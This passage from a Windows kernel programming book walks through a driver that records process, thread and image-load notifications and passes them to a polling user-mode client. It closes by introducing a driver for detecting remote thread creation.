Given this declaration, we can begin implementation for process creation (CreateInfo is non-NULL):
USHORT allocSize = sizeof(FullItem<ProcessCreateInfo>);
USHORT commandLineSize = 0;
if (CreateInfo->CommandLine) {
commandLineSize = CreateInfo->CommandLine->Length;
allocSize += commandLineSize;
}
auto info = (FullItem<ProcessCreateInfo>*)ExAllocatePoolWithTag(
PagedPool, allocSize, DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "failed allocation\n"));
return;
}
The total size for an allocation is based on the command line length (if any). Now it’s time to fill in the
fixed-size details:
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Type = ItemType::ProcessCreate;
item.Size = sizeof(ProcessCreateInfo) + commandLineSize;
item.ProcessId = HandleToULong(ProcessId);
item.ParentProcessId = HandleToULong(CreateInfo->ParentProcessId);
item.CreatingProcessId = HandleToULong(
CreateInfo->CreatingThreadId.UniqueProcess);
item.CreatingThreadId = HandleToULong(
CreateInfo->CreatingThreadId.UniqueThread);
The item size must be calculated to include the command line length.
Next, we need to copy the command line to the address where CommandLine begins, and set the correct
command line length:
Chapter 9: Process and Thread Notifications
276
if (commandLineSize > 0) {
memcpy(item.CommandLine, CreateInfo->CommandLine->Buffer, commandLineSize);
item.CommandLineLength = commandLineSize / sizeof(WCHAR); // len in WCHARs
}
else {
item.CommandLineLength = 0;
}
g_State.AddItem(&info->Entry);
The command line length is stored in characters, rather than bytes. This is not mandatory, of course, but
would probably be easier to use by user mode code. Notice the command line is not NULL terminated - it’s
up to the client not read too many characters. As an alternative, we can make the string null terminated
to simplify client code. In fact, if we do that, the command line length is not even needed.
Make the command line NULL-terminated and remove the command line length.
Astute readers may notice that the calculated data length is actually one character longer
than needed, perfect for adding a NULL-terminator. Why? sizeof(ProcessCreateInfo)
includes one character of the command line.
For easier reference, here is the complete process notify callback implementation:
void OnProcessNotify(PEPROCESS Process, HANDLE ProcessId,
PPS_CREATE_NOTIFY_INFO CreateInfo) {
if (CreateInfo) {
USHORT allocSize = sizeof(FullItem<ProcessCreateInfo>);
USHORT commandLineSize = 0;
if (CreateInfo->CommandLine) {
commandLineSize = CreateInfo->CommandLine->Length;
allocSize += commandLineSize;
}
auto info = (FullItem<ProcessCreateInfo>*)ExAllocatePoolWithTag(
PagedPool, allocSize, DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "failed allocation\n"));
return;
}
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
Chapter 9: Process and Thread Notifications
277
item.Type = ItemType::ProcessCreate;
item.Size = sizeof(ProcessCreateInfo) + commandLineSize;
item.ProcessId = HandleToULong(ProcessId);
item.ParentProcessId = HandleToULong(CreateInfo->ParentProcessId);
item.CreatingProcessId = HandleToULong(
CreateInfo->CreatingThreadId.UniqueProcess);
item.CreatingThreadId = HandleToULong(
CreateInfo->CreatingThreadId.UniqueThread);
if (commandLineSize > 0) {
memcpy(item.CommandLine, CreateInfo->CommandLine->Buffer,
commandLineSize);
item.CommandLineLength = commandLineSize / sizeof(WCHAR);
}
else {
item.CommandLineLength = 0;
}
g_State.AddItem(&info->Entry);
}
else {
auto info = (FullItem<ProcessExitInfo>*)ExAllocatePoolWithTag(
PagedPool, sizeof(FullItem<ProcessExitInfo>), DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "failed allocation\n"));
return;
}
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Type = ItemType::ProcessExit;
item.ProcessId = HandleToULong(ProcessId);
item.Size = sizeof(ProcessExitInfo);
item.ExitCode = PsGetProcessExitStatus(Process);
g_State.AddItem(&info->Entry);
}
}
Providing Data to User Mode
The next thing to consider is how to provide the gathered information to a user-mode client. There are
several options that could be used, but for this driver we’ll let the client poll the driver for information
Chapter 9: Process and Thread Notifications
278
using a read request. The driver will fill the user-provided buffer with as many events as possible, until
either the buffer is exhausted or there are no more events in the queue.
We’ll start the read request by obtaining the address of the user’s buffer with Direct I/O (set up in
DriverEntry):
NTSTATUS SysMonRead(PDEVICE_OBJECT, PIRP Irp) {
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
auto len = irpSp->Parameters.Read.Length;
auto status = STATUS_SUCCESS;
ULONG bytes = 0;
NT_ASSERT(Irp->MdlAddress);
// we're using Direct I/O
auto buffer = (PUCHAR)MmGetSystemAddressForMdlSafe(
Irp->MdlAddress, NormalPagePriority);
if (!buffer) {
status = STATUS_INSUFFICIENT_RESOURCES;
}
Now we need to access our linked list and pull items from its head. We’ll add this support to the Global
class by implementing a method that removed an item from the head and returns it. If the list is empty, it
returns NULL:
LIST_ENTRY* Globals::RemoveItem() {
Locker locker(m_Lock);
auto item = RemoveHeadList(&m_ItemsHead);
if (item == &m_ItemsHead)
return nullptr;
m_Count--;
return item;
}
If the linked list is empty, RemoveHeadList returns the head itself. It’s also possible to use IsListEmpty
to make that determination. Lastly, we can check if m_Count is zero - all these are equivalent. If there is
an item, it’s returned as a LIST_ENTRY pointer.
Back to the Read dispatch routine - we can now loop around, getting an item out, copying its data to the
user-mode buffer, until the list is empty or the buffer is full:
Chapter 9: Process and Thread Notifications
279
else {
while (true) {
auto entry = g_State.RemoveItem();
if (entry == nullptr)
break;
//
// get pointer to the actual data item
//
auto info = CONTAINING_RECORD(entry, FullItem<ItemHeader>, Entry);
auto size = info->Data.Size;
if (len < size) {
//
// user's buffer too small, insert item back
//
g_State.AddHeadItem(entry);
break;
}
memcpy(buffer, &info->Data, size);
len -= size;
buffer += size;
bytes += size;
ExFreePool(info);
}
}
return CompleteRequest(Irp, status, bytes);
Globals::RemoveItem is called to retrieve the head item (if any). Then we have to check if the
remaining bytes in the user’s buffer are enough to contain the data of this item. If not, we have to push
the item back to the head of the queue, accomplished with another method in the Globals class:
void Globals::AddHeadItem(LIST_ENTRY* entry) {
Locker locker(m_Lock);
InsertHeadList(&m_ItemsHead, entry);
m_Count++;
}
If there is enough room in the buffer, a simple memcpy is used to copy the actual data (everything except
the LIST_ENTRY to the user’s buffer). Finally, the variables are adjusted based on the size of this item and
the loop repeats.
Once out of the loop, the only thing remaining is to complete the request with whatever status and
information (bytes) have been accumulated thus far.
We need to take a look at the unload routine as well. If there are items in the linked list, they must be freed
explicitly; otherwise, we have a leak on our hands:
Chapter 9: Process and Thread Notifications
280
void SysMonUnload(PDRIVER_OBJECT DriverObject) {
PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, TRUE);
LIST_ENTRY* entry;
while ((entry = g_State.RemoveItem()) != nullptr)
ExFreePool(CONTAINING_RECORD(entry, FullItem<ItemHeader>, Entry));
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\sysmon");
IoDeleteSymbolicLink(&symLink);
IoDeleteDevice(DriverObject->DeviceObject);
}
The linked list items are freed by repeatedly removing items from the list and calling ExFreePool on
each item.
The User Mode Client
Once we have all this in place, we can write a user mode client that polls data using ReadFile and
displays the results.
The main function calls ReadFile in a loop, sleeping a bit so that the thread is not always consuming
CPU. Once some data arrives, it’s sent for display purposes:
#include <Windows.h>
#include <stdio.h>
#include <memory>
#include <string>
#include "..\SysMon\SysMonPublic.h"
int main() {
auto hFile = CreateFile(L"\\\\.\\SysMon", GENERIC_READ, 0,
nullptr, OPEN_EXISTING, 0, nullptr);
if (hFile == INVALID_HANDLE_VALUE)
return Error("Failed to open file");
int size = 1 << 16;
// 64 KB
auto buffer = std::make_unique<BYTE[]>(size);
while (true) {
DWORD bytes = 0;
// error handling omitted
ReadFile(hFile, buffer.get(), size, &bytes, nullptr);
if (bytes)
Chapter 9: Process and Thread Notifications
281
DisplayInfo(buffer.get(), bytes);
// wait a bit before polling again
Sleep(400);
}
// never actually reached
CloseHandle(hFile);
return 0;
}
The DisplayInfo function must make sense of the buffer it’s given. Since all events start with a common
header, the function distinguishes the various events based on the ItemType. After the event has been
dealt with, the Size field in the header indicates where the next event starts:
void DisplayInfo(BYTE* buffer, DWORD size) {
while (size > 0) {
auto header = (ItemHeader*)buffer;
switch (header->Type) {
case ItemType::ProcessExit:
{
DisplayTime(header->Time);
auto info = (ProcessExitInfo*)buffer;
printf("Process %u Exited (Code: %u)\n",
info->ProcessId, info->ExitCode);
break;
}
case ItemType::ProcessCreate:
{
DisplayTime(header->Time);
auto info = (ProcessCreateInfo*)buffer;
std::wstring commandline(info->CommandLine,
info->CommandLineLength);
printf("Process %u Created. Command line: %ws\n",
info->ProcessId, commandline.c_str());
break;
}
}
buffer += header->Size;
size -= header->Size;
}
Chapter 9: Process and Thread Notifications
282
}
To extract the command line properly, the code uses the C++ wstring class constructor that can build a
string based on a pointer and the string length. The DisplayTime helper function formats the time in a
human-readable way:
void DisplayTime(const LARGE_INTEGER& time) {
//
// LARGE_INTEGER and FILETIME have the same size
// representing the same format in our case
//
FILETIME local;
//
// convert to local time first (KeQuerySystemTime(Procise) returns UTC)
//
FileTimeToLocalFileTime((FILETIME*)&time, &local);
SYSTEMTIME st;
FileTimeToSystemTime(&local, &st);
printf("%02d:%02d:%02d.%03d: ",
st.wHour, st.wMinute, st.wSecond, st.wMilliseconds);
}
SYSTEMTIME is a convenient structure to work with, as it contains all ingredients of a date and time. In
the above code, only the time is displayed, but the date components are present as well.
That’s all we need to begin testing the driver and the client.
The driver can be installed and started as done in earlier chapters, similar to the following:
sc create sysmon type= kernel binPath= C:\Test\SysMon.sys
sc start sysmon
Here is some sample output when running SysMonClient.exe:
16:18:51.961: Process 13124 Created. Command line: "C:\Program Files (x86)\Micr\
osoft\Edge\Application\97.0.1072.62\identity_helper.exe" --type=utility --utili\
ty-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,1091\
8786588500781911,4196358801973005731,131072 --lang=en-US --service-sandbox-type\
=none --mojo-platform-channel-handle=5404 /prefetch:8
16:18:51.967: Process 13124 Exited (Code: 3221226029)
16:18:51.969: Process 6216 Created. Command line: "C:\Program Files (x86)\Micro\
soft\Edge\Application\97.0.1072.62\identity_helper.exe" --type=utility --utilit\
Chapter 9: Process and Thread Notifications
283
y-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,10918\
786588500781911,4196358801973005731,131072 --lang=en-US --service-sandbox-type=\
none --mojo-platform-channel-handle=5404 /prefetch:8
16:18:53.836: Thread 12456 Created in process 10720
16:18:58.159: Process 10404 Exited (Code: 1)
16:19:02.033: Process 6216 Exited (Code: 0)
16:19:28.163: Process 9360 Exited (Code: 0)
Thread Notifications
The kernel provides thread creation and destruction callbacks, similarly to process callbacks. The API to
use for registration is PsSetCreateThreadNotifyRoutine and for unregistering there is another API,
PsRemoveCreateThreadNotifyRoutine:
NTSTATUS PsSetCreateThreadNotifyRoutine(
_In_ PCREATE_THREAD_NOTIFY_ROUTINE NotifyRoutine);
NTSTATUS PsRemoveCreateThreadNotifyRoutine (
_In_ PCREATE_THREAD_NOTIFY_ROUTINE NotifyRoutine);
The arguments provided to the callback routine are the process ID, thread ID and whether the thread is
being created or destroyed:
typedef void (*PCREATE_THREAD_NOTIFY_ROUTINE)(
_In_ HANDLE ProcessId,
_In_ HANDLE ThreadId,
_In_ BOOLEAN Create);
If a thread is created, the callback is executed by the creator thread; if the thread exits, the callback executes
on that thread.
We’ll extend the existing SysMon driver to receive thread notifications as well as process notifications.
First, we’ll add enum values for thread events and a structure representing the information, all in the
SysMonCommon.h header file:
enum class ItemType : short {
None,
ProcessCreate,
ProcessExit,
ThreadCreate,
ThreadExit
};
struct ThreadCreateInfo : ItemHeader {
Chapter 9: Process and Thread Notifications
284
ULONG ThreadId;
ULONG ProcessId;
};
struct ThreadExitInfo : ThreadCreateInfo {
ULONG ExitCode;
};
It’s convenient to have ThreadExitInfo inherit from ThreadCreateInfo, as they share the thread
and process IDs. It’s certainly not mandatory, but it makes the thread notification callback a bit simpler to
write.
Now we can add the proper registration to DriverEntry, right after registering for process notifications:
status = PsSetCreateThreadNotifyRoutine(OnThreadNotify);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to set thread callbacks (0x%08X)\n",
status));
break;
}
Conversley, a call to PsRemoveCreateThreadNotifyRoutine is needed in the Unload routine:
// in SysMonUnload
PsRemoveCreateThreadNotifyRoutine(OnThreadNotify);
The callback routine itself is simpler than the process notification callback, since the event structures have
fixed sizes. Here is the thread callback routine in its entirety:
void OnThreadNotify(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create) {
//
// handle create and exit with the same code block, tweaking as needed
//
auto size = Create ? sizeof(FullItem<ThreadCreateInfo>)
: sizeof(FullItem<ThreadExitInfo>);
auto info = (FullItem<ThreadExitInfo>*)ExAllocatePoolWithTag(
PagedPool, size, DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "Failed to allocate memory\n"));
return;
}
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
Chapter 9: Process and Thread Notifications
285
item.Size = Create ? sizeof(ThreadCreateInfo) : sizeof(ThreadExitInfo);
item.Type = Create ? ItemType::ThreadCreate : ItemType::ThreadExit;
item.ProcessId = HandleToULong(ProcessId);
item.ThreadId = HandleToULong(ThreadId);
if (!Create) {
PETHREAD thread;
if (NT_SUCCESS(PsLookupThreadByThreadId(ThreadId, &thread))) {
item.ExitCode = PsGetThreadExitStatus(thread);
ObDereferenceObject(thread);
}
}
g_State.AddItem(&info->Entry);
}
Most of this code should look pretty familiar. The slightly complex part if retrieving the thread exit code.
PsGetThreadExitStatus can be used for that, but that API requires a thread object pointer rather
than an ID. PsLookupThreadByThreadId is used to obtain the thread object that is passed to
PsGetThreadExitStatus. It’s important to remember to call ObDereferenceObject on the thread
object or else it will linger in memory until the next system restart.
To complete the implementation, we’ll add code to the client that knows how to display thread creation
and destruction (in the switch block inside DisplayInfo):
case ItemType::ThreadCreate:
{
DisplayTime(header->Time);
auto info = (ThreadCreateInfo*)buffer;
printf("Thread %u Created in process %u\n",
info->ThreadId, info->ProcessId);
break;
}
case ItemType::ThreadExit:
{
DisplayTime(header->Time);
auto info = (ThreadExitInfo*)buffer;
printf("Thread %u Exited from process %u (Code: %u)\n",
info->ThreadId, info->ProcessId, info->ExitCode);
break;
}
Here is some sample output given the updated driver and client:
Chapter 9: Process and Thread Notifications
286
16:19:41.500: Thread 10512 Created in process 9304
16:19:41.500: Thread 10512 Exited from process 9304 (Code: 0)
16:19:41.500: Thread 4424 Exited from process 9304 (Code: 0)
16:19:41.501: Thread 10180 Exited from process 9304 (Code: 0)
16:19:41.777: Process 14324 Created. Command line: "C:\WINDOWS\system32\defrag.\
exe" -p bf8 -s 00000000000003BC -b -OnlyPreferred C:
16:19:41.777: Thread 8120 Created in process 14324
16:19:41.780: Process 11572 Created. Command line: \??\C:\WINDOWS\system32\conh\
ost.exe 0xffffffff -ForceV1
16:19:41.780: Thread 7952 Created in process 11572
16:19:41.784: Thread 8748 Created in process 11572
16:19:41.784: Thread 6408 Created in process 11572
Add client code that displays the process image name for thread create and exit.
Windows 10 adds another registration function that provides additional flexibility.
typedef enum _PSCREATETHREADNOTIFYTYPE {
PsCreateThreadNotifyNonSystem = 0,
PsCreateThreadNotifySubsystems = 1
} PSCREATETHREADNOTIFYTYPE;
NTSTATUS PsSetCreateThreadNotifyRoutineEx(
_In_ PSCREATETHREADNOTIFYTYPE NotifyType,
_In_ PVOID NotifyInformation);
// PCREATE_THREAD_NOTIFY_ROUTINE
Using PsCreateThreadNotifyNonSystem indicates the callback for new threads should execute on
the newly created thread, rather than the creator.
Image Load Notifications
The last callback mechanism we’ll look at in this chapter is image load notifications. Whenever a PE image
(EXE, DLL, driver) file loads, the driver can receive a notification.
The PsSetLoadImageNotifyRoutine API registers for these notifications, and PsRemoveImageNo-
tifyRoutine is used for unregistering:
Chapter 9: Process and Thread Notifications
287
NTSTATUS PsSetLoadImageNotifyRoutine(
_In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
NTSTATUS PsRemoveLoadImageNotifyRoutine(
_In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
The callback function has the following prototype:
typedef void (*PLOAD_IMAGE_NOTIFY_ROUTINE)(
_In_opt_ PUNICODE_STRING FullImageName,
_In_ HANDLE ProcessId,
// pid into which image is being mapped
_In_ PIMAGE_INFO ImageInfo);
Curiously enough, there is no callback mechanism for image unloads.
The FullImageName argument is somewhat tricky. As indicated by the SAL annotation, it’s optional and
can be NULL. Even if it’s not NULL, it doesn’t always produce the correct image file name before Windows
10. The reasons for that are rooted deep in the kernel, it’s I/O system and the file system cache. In most
cases, this works fine, and the format of the path is the internal NT format, starting with something like
“\Device\HadrdiskVolumex\…” rather than “c:\…”. Translation can be done in a few ways, we’ll see one way
when we look at the client code.
The ProcessId argument is the process ID into which the image is loaded. For drivers (kernel modules),
this value is zero.
The ImageInfo argument contains additional information on the image, declared as follows:
#define IMAGE_ADDRESSING_MODE_32BIT
3
typedef struct _IMAGE_INFO {
union {
ULONG Properties;
struct {
ULONG ImageAddressingMode
: 8;
// Code addressing mode
ULONG SystemModeImage
: 1;
// System mode image
ULONG ImageMappedToAllPids : 1;
// Image mapped into all processes
ULONG ExtendedInfoPresent
: 1;
// IMAGE_INFO_EX available
ULONG MachineTypeMismatch
: 1;
// Architecture type mismatch
ULONG resourcesignatureLevel
: 4;
// Signature level
ULONG resourcesignatureType
: 3;
// Signature type
ULONG ImagePartialMap
: 1;
// Nonzero if entire image is not \
mapped
Chapter 9: Process and Thread Notifications
288
ULONG Reserved
: 12;
};
};
PVOID
ImageBase;
ULONG
resourceselector;
SIZE_T
resourcesize;
ULONG
resourcesectionNumber;
} IMAGE_INFO, *PIMAGE_INFO;
Here is quick rundown of the important fields in this structure:
• SystemModeImage - this flag is set for a kernel image, and unset for a user mode image.
• resourcesignatureLevel - signing level for Protected Processes Light (PPL) (Windows 8.1 and later).
See SE_SIGNING_LEVEL_ constants in the WDK.
• resourcesignatureType - signature type for PPL (Windows 8.1 and later). See the SE_IMAGE_SIG-
NATURE_TYPE enumeration in the WDK.
• ImageBase - the virtual address into which the image is loaded.
• ImageSize - the size of the image.
• ExtendedInfoPresent - if this flag is set, then IMAGE_INFO is part of a larger structure, IMAGE_-
INFO_EX, shown here:
typedef struct _IMAGE_INFO_EX {
SIZE_T
Size;
IMAGE_INFO
ImageInfo;
struct _FILE_OBJECT *FileObject;
} IMAGE_INFO_EX, *PIMAGE_INFO_EX;
To access this larger structure, a driver can use the CONTAINING_RECORD macro like so:
if (ImageInfo->ExtendedInfoPresent) {
auto exinfo = CONTAINING_RECORD(ImageInfo, IMAGE_INFO_EX, ImageInfo);
// access FileObject
}
The extended structure adds just one meaningful member - the file object used to open the image. This
may be useful for retrieving the file name in pre-WIndows 10 machines, as we’ll soon see.
As with the process and thread notifications, we’ll add the needed code to register in DriverEntry and
the code to unregister in the Unload routine. Here is the full DriverEntry function (with KdPrint calls
removed for brevity):
Chapter 9: Process and Thread Notifications
289
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
auto status = STATUS_SUCCESS;
PDEVICE_OBJECT DeviceObject = nullptr;
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\sysmon");
bool symLinkCreated = false;
bool processCallbacks = false, threadCallbacks = false;
do {
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\sysmon");
status = IoCreateDevice(DriverObject, 0, &devName,
FILE_DEVICE_UNKNOWN, 0, TRUE, &DeviceObject);
if (!NT_SUCCESS(status)) {
break;
}
DeviceObject->Flags |= DO_DIRECT_IO;
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status)) {
break;
}
symLinkCreated = true;
status = PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, FALSE);
if (!NT_SUCCESS(status)) {
break;
}
processCallbacks = true;
status = PsSetCreateThreadNotifyRoutine(OnThreadNotify);
if (!NT_SUCCESS(status)) {
break;
}
threadCallbacks = true;
status = PsSetLoadImageNotifyRoutine(OnImageLoadNotify);
if (!NT_SUCCESS(status)) {
break;
}
} while (false);
if (!NT_SUCCESS(status)) {
Chapter 9: Process and Thread Notifications
290
if (threadCallbacks)
PsRemoveCreateThreadNotifyRoutine(OnThreadNotify);
if (processCallbacks)
PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, TRUE);
if (symLinkCreated)
IoDeleteSymbolicLink(&symLink);
if (DeviceObject)
IoDeleteDevice(DeviceObject);
return status;
}
g_State.Init(10000);
DriverObject->DriverUnload = SysMonUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = SysMonCreateClose;
DriverObject->MajorFunction[IRP_MJ_READ] = SysMonRead;
return status;
}
We’ll add an event type to the ItemType enum:
enum class ItemType : short {
None,
ProcessCreate,
ProcessExit,
ThreadCreate,
ThreadExit,
ImageLoad
};
As before, we need a structure to contain the information we can get from image load:
const int MaxImageFileSize = 300;
struct ImageLoadInfo : ItemHeader {
ULONG ProcessId;
ULONG ImageSize;
ULONG64 LoadAddress;
WCHAR ImageFileName[MaxImageFileSize + 1];
};
Chapter 9: Process and Thread Notifications
291
For variety, ImageLoadInfo uses a fixed size array to store the path to the image file. The interested
reader should change that to use a scheme similar to process create notifications.
The image load notification starts by not storing information on kernel images:
void OnImageLoadNotify(PUNICODE_STRING FullImageName,
HANDLE ProcessId, PIMAGE_INFO ImageInfo) {
if (ProcessId == nullptr) {
// system image, ignore
return;
}
This is not necessary, of course. You can remove the above check so that kernel images are reported as
well. Next, we allocate the data structure and fill in the usual information:
auto size = sizeof(FullItem<ImageLoadInfo>);
auto info = (FullItem<ImageLoadInfo>*)ExAllocatePoolWithTag(PagedPool, size, DR\
IVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "Failed to allocate memory\n"));
return;
}
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Size = sizeof(item);
item.Type = ItemType::ImageLoad;
item.ProcessId = HandleToULong(ProcessId);
item.ImageSize = (ULONG)ImageInfo->ImageSize;
item.LoadAddress = (ULONG64)ImageInfo->ImageBase;
The interesting part is the image path. The simplest option is to examine FullImageName, and if non-
NULL, just grab its contents. But since this information might be missing or not 100% reliable, we can try
something else first, and fall back on FullImageName if all else fails.
The secret is to use FltGetFileNameInformationUnsafe - a variant on FltGetFileNameInfor-
mation that is used with File System Mini-filters, as we’ll see in chapter 12. The “Unsafe” version can be
called in non-file-system contexts as is our case. A full discussion on FltGetFileNameInformation
is saved for chapter 12. For now, let’s just use if the file object is available:
Chapter 9: Process and Thread Notifications
292
item.ImageFileName[0] = 0;
// assume no file information
if (ImageInfo->ExtendedInfoPresent) {
auto exinfo = CONTAINING_RECORD(ImageInfo, IMAGE_INFO_EX, ImageInfo);
PFLT_FILE_NAME_INFORMATION nameInfo;
if (NT_SUCCESS(FltGetFileNameInformationUnsafe(exinfo->FileObject,
nullptr, FLT_FILE_NAME_NORMALIZED | FLT_FILE_NAME_QUERY_DEFAULT,
&nameInfo))) {
// copy the file path
wcscpy_s(item.ImageFileName, nameInfo->Name.Buffer);
FltReleaseFileNameInformation(nameInfo);
}
}
FltGetFileNameInformationUnsafe requires the file object that can be obtained from the extended
IMAGE_INFO_EX structure. wcscpy_s ensures we don’t copy more characters than are available in the
buffer. FltReleaseFileNameInformation must be called to free the PFLT_FILE_NAME_INFORMA-
TION object allocated by FltGetFileNameInformationUnsafe.
To gain access to these functions, add #include for <FltKernel.h> and add FlgMgr.lib into the Linker Input
/ Additional Dependencies line.
Finally, if this method does not produce a result, we fall back to using the provided image path:
if (item.ImageFileName[0] == 0 && FullImageName) {
wcscpy_s(item.ImageFileName, FullImageName->Buffer);
}
g_State.AddItem(&info->Entry);
Here is the full image load notification code for easier reference (KdPrint removed):
void OnImageLoadNotify(PUNICODE_STRING FullImageName, HANDLE ProcessId, PIMAGE_\
INFO ImageInfo) {
if (ProcessId == nullptr) {
// system image, ignore
return;
}
auto size = sizeof(FullItem<ImageLoadInfo>);
auto info = (FullItem<ImageLoadInfo>*)ExAllocatePoolWithTag(
Chapter 9: Process and Thread Notifications
293
PagedPool, size, DRIVER_TAG);
if (info == nullptr)
return;
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Size = sizeof(item);
item.Type = ItemType::ImageLoad;
item.ProcessId = HandleToULong(ProcessId);
item.ImageSize = (ULONG)ImageInfo->ImageSize;
item.LoadAddress = (ULONG64)ImageInfo->ImageBase;
item.ImageFileName[0] = 0;
if (ImageInfo->ExtendedInfoPresent) {
auto exinfo = CONTAINING_RECORD(ImageInfo, IMAGE_INFO_EX, ImageInfo);
PFLT_FILE_NAME_INFORMATION nameInfo;
if (NT_SUCCESS(FltGetFileNameInformationUnsafe(
exinfo->FileObject, nullptr,
FLT_FILE_NAME_NORMALIZED | FLT_FILE_NAME_QUERY_DEFAULT,
&nameInfo))) {
wcscpy_s(item.ImageFileName, nameInfo->Name.Buffer);
FltReleaseFileNameInformation(nameInfo);
}
}
if (item.ImageFileName[0] == 0 && FullImageName) {
wcscpy_s(item.ImageFileName, FullImageName->Buffer);
}
g_State.AddItem(&info->Entry);
}
Final Client Code
The client code must be extended for image loads. It seems easy enough except for one snag: the resulting
image path retrieved in the image load notification is in NT Device form, instead of the more common,
“DOS based” form with drive letters, which in fact are symbolic links. We can see these mappings in tools
such as WinObj from Sysinternals (figure 9-3).
Chapter 9: Process and Thread Notifications
294
Figure 9-3: Symbolic links in WinObj
Notice the device name targets for C: and D: in figure 9-3. A file like c:\temp\mydll.dll will be reported as
\Device\DeviceHarddiskVolume3\temp\mydll.dll. It would be nice if the display would show the common
mappings instead of the NT device name.
One way of getting these mappings is by calling QueryDosDevice, which retrieves the target of a
symbolic link stored in the “??” Object Manager directory. We are already familiar with these symbolic
links, as they are valid strings to the CreateFile API.
Based on QueryDosDevice, we can loop over all existing drive letters and store the targets. Then, we
can lookup every device name and find its drive letter (symbolic link). Here is a function to do that. If we
can’t find a match, we’ll just return the original string:
#include <unordered_map>
std::wstring GetDosNameFromNTName(PCWSTR path) {
if (path[0] != L'\\')
return path;
static std::unordered_map<std::wstring, std::wstring> map;
if (map.empty()) {
auto drives = GetLogicalDrives();
int c = 0;
WCHAR root[] = L"X:";
WCHAR target[128];
while (drives) {
if (drives & 1) {
root[0] = 'A' + c;
if (QueryDosDevice(root, target, _countof(target))) {
map.insert({ target, root });
}
}
Chapter 9: Process and Thread Notifications
295
drives >>= 1;
c++;
}
}
auto pos = wcschr(path + 1, L'\\');
if (pos == nullptr)
return path;
pos = wcschr(pos + 1, L'\\');
if (pos == nullptr)
return path;
std::wstring ntname(path, pos - path);
if (auto it = map.find(ntname); it != map.end())
return it->second + std::wstring(pos);
return path;
}
I will let the interested reader figure out how this code works. In any case, since user-mode is not the focus
of this book, you can just use the function as is, as we’ll do in our client.
Here is the part in DisplayInfo that handles image load notifications (within the switch):
case ItemType::ImageLoad:
{
DisplayTime(header->Time);
auto info = (ImageLoadInfo*)buffer;
printf("Image loaded into process %u at address 0x%llX (%ws)\n",
info->ProcessId, info->LoadAddress,
GetDosNameFromNTName(info->ImageFileName).c_str());
break;
}
Here is some example output when running the full driver and client:
Chapter 9: Process and Thread Notifications
296
18:59:37.660: Image loaded into process 12672 at address 0x7FFD531C0000 (C:\Win\
dows\System32\msvcp110_win.dll)
18:59:37.661: Image loaded into process 12672 at address 0x7FFD5BF30000 (C:\Win\
dows\System32\advapi32.dll)
18:59:37.676: Thread 11416 Created in process 5820
18:59:37.676: Thread 12496 Created in process 4824
18:59:37.731: Thread 6636 Created in process 3852
18:59:37.731: Image loaded into process 12672 at address 0x7FFD59F70000 (C:\Win\
dows\System32\ntmarta.dll)
18:59:37.735: Image loaded into process 12672 at address 0x7FFD51340000 (C:\Win\
dows\System32\policymanager.dll)
18:59:37.735: Image loaded into process 12672 at address 0x7FFD531C0000 (C:\Win\
dows\System32\msvcp110_win.dll)
18:59:37.737: Image loaded into process 12672 at address 0x7FFD51340000 (C:\Win\
dows\System32\policymanager.dll)
18:59:37.737: Image loaded into process 12672 at address 0x7FFD531C0000 (C:\Win\
dows\System32\msvcp110_win.dll)
18:59:37.756: Thread 6344 Created in process 704
Add the process name in image load notifications.
Create a driver that monitors process creation and allows a client application to configure
executable paths that should not be allowed to execute.
Remote Thread Detection
One interesting example of using process and thread notifications is to detect remote threads. A remote
thread is one that is created (injected) to a process different than its creator. This fairly well-known
technique can be used (for example) to force the new thread to load a DLL, essentially injecting that
DLL into another process.
This scenario is not necessarily malicious, but it could be. The most common example where this happens
is when a debugger attaches to a target and wants to break into the target. This is done by creating a
thread in the target process (by the debugger process) and pointing the thread function to an API such as
DebugBreak that forces a breakpoint, allowing the debugger to gain control.
Anti-malware systems know how to detect these scenarios, as these may be malicious. Let’s build a driver
that can make that kind of detection. At first, it seems to be very simple: when a thread is created, compare
its creator’s process ID with the target process where the thread is created, and if they are different - you
have a remote thread on your hands.
There is a small dent in the above description. The first thread in any process is “remote” by definition,
because it’s created by some other process (typically the one calling CreateProcess), so this “natural”
occurrence should not be considered a remote thread creation.
Chapter 9: Process and Thread Notifications
297
If you feel up to it, code this driver on your own!
The core of the driver are process and thread notification callbacks. The most important is the thread
creation callback, where the driver’s job is to determine whether a created thread is a remote one or not.
We must keep an eye for new processes as well, because the first thread in a new process is technically
remote, but we need to ignore it.
The data maintained by the driver and later provided to the client contains the following (DetectorPublic.h):
struct RemoteThread {
LARGE_INTEGER Time;
ULONG CreatorProcessId;
ULONG CreatorThreadId;
ULONG ProcessId;
ULONG ThreadId;
};
Here is the data we’ll store as part of the driver (in KDetector.h):
struct RemoteThreadItem {
LIST_ENTRY Link;
RemoteThread Remote;
};
